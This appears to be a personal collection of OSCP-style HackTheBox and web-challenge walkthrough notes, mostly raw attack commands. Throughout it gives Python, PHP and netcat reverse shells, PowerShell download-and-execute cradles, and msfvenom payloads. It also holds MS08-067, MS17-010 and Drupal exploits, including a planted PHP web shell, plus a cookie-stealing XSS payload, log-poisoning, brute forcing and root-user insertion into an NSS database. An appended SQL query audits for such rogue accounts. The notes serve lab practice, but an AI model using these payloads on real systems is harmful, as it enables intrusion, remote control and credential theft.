Machines Practice

Follow this Medium series for OSCP-style HackTheBox machine writeups without MSF, by Rana :)


One way to get the root file (sudo vi with a path traversal):
sudo /usr/bin/vi /var/www/html/../../../root/root.txt
2nd way (drop to a shell from inside vi):
[email protected]:/home/haris$ sudo /usr/bin/vi /var/www/html/a
:set shell=/bin/sh
:shell
3rd way (run the shell from the vi command line):
sudo vi /var/www/html/a -c ':!/bin/sh'
python magento_rce.py '' "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 9001 >/tmp/f"


nmap -n -v -Pn -p80,135,139,445,8080,49666,49667 -A --reason -oN nmap.txt
masscan -e tun0 -p1-65535,U:1-65535 --rate=700
smbmap -H -u guest -R | tee smbmap.txt
mount -t cifs -o rw,username=guest,uid=0,gid=0 //


mount -t cifs // /mnt -o user=,password=
find /mnt/ -type f
guestmount --add /mnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt2
secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
java -jar decipher_mremoteng.jar OuhzIwEZtD30y9QFzUOGDDoHnaSWGQFHcD5YSnj/YoJ2sE41GLoykzMgEAZh940z8pKetHSQDonI5/z7


echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);" > exploit.py
/dev/shm - world-writable directory
sudo -u scriptmanager bash
Upload a reverse shell if the normal shell is not working.
Upgrade to a full TTY:
python -c 'import pty;pty.spawn("/bin/bash")'


hydra -l admin -P rockyou.txt http://ip http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect Username" - not working, the IP gets blocked
find . | grep controllers
ldd --version and cat /etc/lsb-release - check the glibc and Ubuntu versions
One solution to get root: create a file monitor.sh
Other trick: get the exploit matching the Ubuntu version (RationalLove exploit)

Blue - Windows machine

EternalBlue: MS17-010
nmap -p 445 --script safe -Pn -n ip [nmap -p 445 --script "vuln and safe" -Pn -n ip]
Modify the Python exploit and put the location of our payload in it (exploit modification required).
Add the computer name to the hosts file and then scan the SMB shares:
smbclient -L \ -N
smbclient \\haris-pc\Users
python exploit.py ip ntsvcs

Sense - Linux machine - pfSense

Manual command injection
On the attacker machine run this command (serves the file cmd to whoever connects):
nc -vnlp port < cmd
In cmd we have this reverse shell code:
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("",3456))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
Listener for the shell:
nc -lvnp 3456
exploit-db exploit


Port 80 is running HttpFileServer (HFS)
tcpdump -i tun0
HFS payload: %00{.exec|ping}
Use Invoke-PowerShellTcp.ps1
C:\Windows\SysWow64 - 32 bit windows
C:\Windows\system32 - 32 bit windows
C:\Windows\Sysnative - 64 bit
C:\Windows\Sysnative\WindowsPowershell\v1.0\powershell.exe ping
Ctrl+Shift+U - to URL-decode
C:\Windows\Sysnative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://ip:port/Invoke-PowerShellTcp.ps1')
Run the Sherlock script to enumerate missing patches (the results may include false positives)
(New-Object Net.WebClient).downloadString('http://ip:port/Invoke-PowerShellTcp.ps1')
Invoke-PowerShellTcp -Reverse -IPAddress -Port 1234
(New-Object Net.WebClient).downloadString('')
cd /poweshell/Empire/data/module_source/privesc/Invoke-MS16032
IEX(New-Object Net.WebClient).downloadString('')
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('')"

Node - Linux

Port 3000 - Node.js app
sed 's/,/\n/g' notes - extract the passwords
Crack the hashes online and offline.
Crack the hashes with hashcat and john:
hashcat -a 0 -m 1400 dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af /usr/share/dict/rockyou.txt
john --format=Raw-SHA256 --wordlist=/usr/share/dict/rockyou.txt hash.txt
cat /home/alamot/.john/john.pot
Online: hashes.org
grep -Ri password . | less
fcrackzip - password cracker for zip files:
fcrackzip -D -p /usr/share/wordlists/rockyou.txt backup.zip
Download the file with wget using the session cookie:
wget --header "Cookie: connect.sid=s%3AuGlwY_gicWrNb2ESIiDzUPn9TTi-Dstj.5E1wGaKmQ7QgeS%2BC5%2FfZ3mjy8DCwSdySPOv4rRvvZfU"
base64 -d myplace.backup >myplace
Privesc to user tom
mongo -u 'mark' -p '5AYRft73VtFpc84k' scheduler
find / -user root -perm -4000 -exec ls -ld {} \; 2> /dev/null
db.tasks.insert( { "cmd": "/bin/cp /bin/bash /tmp/tombash; chmod u+s /tmp/tombash;" } );
find / -perm -4000 2>/dev/null
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "asd /bin/bash asd"
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 r??t/roo?.txt
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 root
Using wildcards:
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /rt/rt.txt | base64 -d > root.zip
Command injection:
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "$(printf 'aaa\n/bin/sh\nls')"

Legacy - Windows

SMB scan
nmap --script smb-vuln* -p 445 -oA nmap/smb_vulns
First exploit - MS08-067
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.14_443.exe
python ms08-067.py 6 445
wget https://raw.githubusercontent.com/helviojunior/MS17-010/master/send_and_execute.py
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.14_443.exe
python send_and_execute.py rev_10.10.14.14_443.exe
Host the file with smbserver:
smbserver.py a /usr/share/windows-binaries/


Heartbleed vulnerability
python heartbleed.py -n 100 ip
for i in $(seq 0 100); do python heartbleed.py ip; done
Then find hype.key (convert hex to ASCII).
SSH key: use this key together with the password obtained from Heartbleed
ssh -i hype.key [email protected]
Check the history and check ps -elf | grep root
2nd exploit: compile dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
su -
Fuzzy web app challenge
gobuster -u http://docker.hackthebox.eu:42566/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm
gobuster -u http://docker.hackthebox.eu:42566/api/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm
wfuzz --hh=24 -c -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?FUZZ=test
wfuzz --hh=27 -c -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?reset=FUZZ
====================================== HDC HackTheBox Web Challenge Walkthrough/Solution
So the doProcess() function submits the form data to the jQuery; then I had a look at jquery-3.2.1.js (Ctrl+F) and searched for doProcess().
Credentials are stored in the JS file, in the doProcess function.
Find the emails in the secret folder, then run a brute force against all the emails and get the flag.
Lernaean Web Challenge - HackTheBox
hydra -l admin -P /usr/share/wordlists/rockyou.txt ip http-post-form "/:password=^PASS^:Invalid Password!" -s 53593
========================================= CARTOGRAPHER
username='- and password='- - SQL injection


[20 Points] Lernaean [by Arrexel]
hydra -l admin -P /usr/share/wordlists/rockyou.txt docker.hackthebox.eu http-post-form "/:password=^PASS^:Invalid password!" -s 35414
=========================================== [50 Points]
I know Mag1k [by rkmylo]
padbuster http://docker.hackthebox.eu:34849/profile.php 0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D 8 --cookie "iknowmag1k=0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D;PHPSESSID=h8pl413ekrj16ni133irv92nv4"
padbuster http://docker.hackthebox.eu:34849/profile.php 0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D 8 --cookie "iknowmag1k=0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D;PHPSESSID=h8pl413ekrj16ni133irv92nv4" -plaintext "{\"user\":\"qq\",\"role\":\"admin\"}"

Bastard - Windows

Drupal payload changes (the PHP typo 'fuplaod' and the undefined $REQUEST/$ippsec variables are corrected here):
$url = '';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';
$phpcode = <<<'EOD'
<?php
// Fetch a remote file and write it to the given local path
if (isset($_REQUEST['fupload'])) {
    file_put_contents($_REQUEST['fupload'], file_get_contents("" . $_REQUEST['fupload']));
};
// Run a command and return its output
if (isset($_REQUEST['fexec'])) {
    echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
};
?>
EOD;
$file = [ 'filename' => 'sam.php', 'data' => $phpcode ];
IEX(New-Object Net.WebClient).downloadString('')
\\\sam\ms15-051x64.exe "\\sam\nc64.exe -e cmd.exe 443"
[#] ms15-051 fixed by zcgonvh
powershell iex(new-object net.webclient).downloadstring('')
\\a\ms15-051x64.exe "\\a\nc64.exe -e cmd.exe 443"
powershell iex(new-object net.webclient).downloadstring('')
Shell with Nishang
python drupalgeddon3.py "SESSd873f26fc11f2b7e6e4aa0f6fce59913=GCGJfJI7t9GIIV7M7NLK8ARzeURzu83jxeqI2_qcDGs" 1 "powershell iex(new-object net.webclient).downloadstring('')"
\\\share\ms15-051x64.exe "whoami"
\\\share\ms15-051x64.exe "\\\share\nc64.exe -e cmd.exe 443"
Poison - machine vulnerable to LFI
Add this shell into the User-Agent header:
User-Agent: 0xdf: <?php system($_GET['c']); ?>
Then include the log file and check with &c=id
Connectivity check:
tcpdump -i tun0 icmp
view-source: 8081
nc -lnvp 8081
Shell as www
Listening on localhost:
netstat -an -p tcp
ps -auwwx | grep vnc

Tunneling / VNC connection

tail /etc/proxychains.conf
ssh [email protected] -D 8081
proxychains vncviewer -passwd secret
Looking inside /root/.vnc/, there's a passwd file that matches the file secret:
python /opt/vncpasswd.py/vncpasswd.py -d -f secret
LFI filter: php://filter/convert.base64-encode/resource=index.php
Request to add data into a PHP variable that is visible in phpinfo:
Content-Type: multipart/form-data; boundary=--PleaseSubscribe
Content-Length: 166

----PleaseSubscribe
Content-Disposition: form-data; name="sam"; filename="Leaveacomment"

Please share my videos
python sshng2john.py id_rsa > brainfuck-crack
john brainfuck-crack --wordlist=/usr/share/wordlists/rockyou.txt
wpscan --url https://brainfuck.htb --disable-tls-checks
cp /usr/share/exploitdb/exploits/php/webapps/40939.txt .
WordPress exploit -> SMTP creds -> SMTP creds to get the secret forum password -> encryption/decryption
ssh2john id_rsa > id_john
john id_john --wordlist=/usr/share/wordlists/rockyou.txt
In orestis's home directory there are a few files: debug.txt, encrypt.sage and output.txt. After some Google searching, it turns out to be RSA encryption. RSA encryption relies on three prime numbers P, Q, E (two small and one large): https://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e
python -c "print format(24604052029401386049980296953784287079059245867880966944246662849341507003750, 'x').decode('hex')"
6efc1a5dbb8904751ce6566a305bb8ef
Grandparents (Granny & Grandpa)
iptables -A OUTPUT -d -j DROP
davtest --url
Check the MOVE method: MOVE ippsec.html with Destination: ippsec.aspx
MS14-070 exploit works for root; MS15-051 does not work
curl -X PUT --data-binary @shell.aspx
curl -X MOVE -H 'Destination: 5/shell.aspx'
Reverse shell with Metasploit
Check 3 exploits for privilege escalation: ms16-016, ms15-051, ms14-058 - working fine: msf5 exploit(windows/local/ms14_058_track_popup_menu)
Microsoft IIS WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow
Use exploit/windows/iis/iis_webdav_scstoragepathfromurl and set the options as below:
<< use exploit/windows/iis/iis_webdav_scstoragepathfromurl >>
<< options >>
<< set RHOST >>
<< set LHOST <attacking machine ip> >>
<< set LPORT 1234 >>
<< use exploit/windows/local/ms15_051_client_copy_image >>
<< options >>
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt -u -H "Host: FUZZ.redcross.htb" --hw 28 --hc 400
gobuster -k -u https://intra.redcross.htb/documentation -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html,pdf -t 20
XSS payload in the Contact Us form:
<script>new Image().src=""+document.cookie;</script>
On submitting the UserID filter, I'm sent to https://intra.redcross.htb/?o=1&page=app, where o= is the id filtered on. If I try with a ' in there, https://intra.redcross.htb/?o=1'&page=app:
sqlmap -r app.request --delay=1 --batch --dump
sqlmap -r login.req --risk=3 -p o --dbms=mysql --random-agent --delay=1.0 --technique=UE -T users --dbs
nmap -p- --min-rate 5000
python 41162.py -c "ping -c 1" -t [email protected] -m
tcpdump -i tun0 -n icmp
python 41162.py -c "php -r '\$sock=fsockopen(\"\",443);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" -t [email protected] -m
Injection RCE
Burp Suite RCE:

Priv esc to penelope

s = smtplib.SMTP(mailserver,1025)
./h.py -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" -t [email protected] -f [email protected] -m redcross

Priv esc to root

[email protected]:/etc$ psql -h -U unixnss -W unix
openssl passwd -1 0xdf
insert into passwd_table (username, passwd, gid, homedir) values ('penel0xdf', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 1000, '/home/penelope');

Path 1: sudoers Group

insert into passwd_table (username, passwd, gid, homedir) values ('sud0xdfer', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 27, '/home/penelope');
sudo su

Path 2: Via unixnssroot

unix=> insert into passwd_table (username, passwd, gid, homedir) values ('ro0xdft', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 0, '/root');
Find the psql configs:
ls -l nss-pgsql*
cat nss-pgsql-root.conf
psql -h -U unixnssroot -p 5432 -d unix
This user can add a user with user id 0 (root):
insert into passwd_table (username, passwd, uid, gid, homedir) values ('r0xdfot', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 0, 0, '/root');
su r0xdfot
Using this account, we are able to create a new user with UID 0:
insert into passwd_table (username, passwd, uid,gid, homedir) values ('snowscan_root','$6$oTkOZvS...',0,0,'/root');
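An added audit query, not part of the original notes, that a defender can run against the same NSS-backed passwd_table to surface the kind of rows the inserts above create; it assumes the columns used in those inserts (username, passwd, uid, gid, homedir) and that gid 27 is the sudo group and gid 0 is root, as on the page.

```sql
-- Added defensive check, not from the original notes.
-- Assumes the passwd_table schema implied by the inserts above:
--   username, passwd, uid, gid, homedir
-- Flags any non-root account that maps to uid 0, to the root (0) or
-- sudo (27) group, to /root, or that shares a home directory with
-- another account (e.g. a second user pointed at /home/penelope).
SELECT p.username, p.uid, p.gid, p.homedir
FROM passwd_table AS p
WHERE p.username <> 'root'
  AND (
        p.uid = 0
     OR p.gid IN (0, 27)
     OR p.homedir = '/root'
     OR p.homedir IN (
          SELECT homedir
          FROM passwd_table
          GROUP BY homedir
          HAVING COUNT(*) > 1
        )
  )
ORDER BY p.uid, p.username;
```

Any row returned should be compared against the expected account list; the NSS configuration (nss-pgsql*.conf) decides which database user can insert here, so also review which roles hold INSERT on passwd_table.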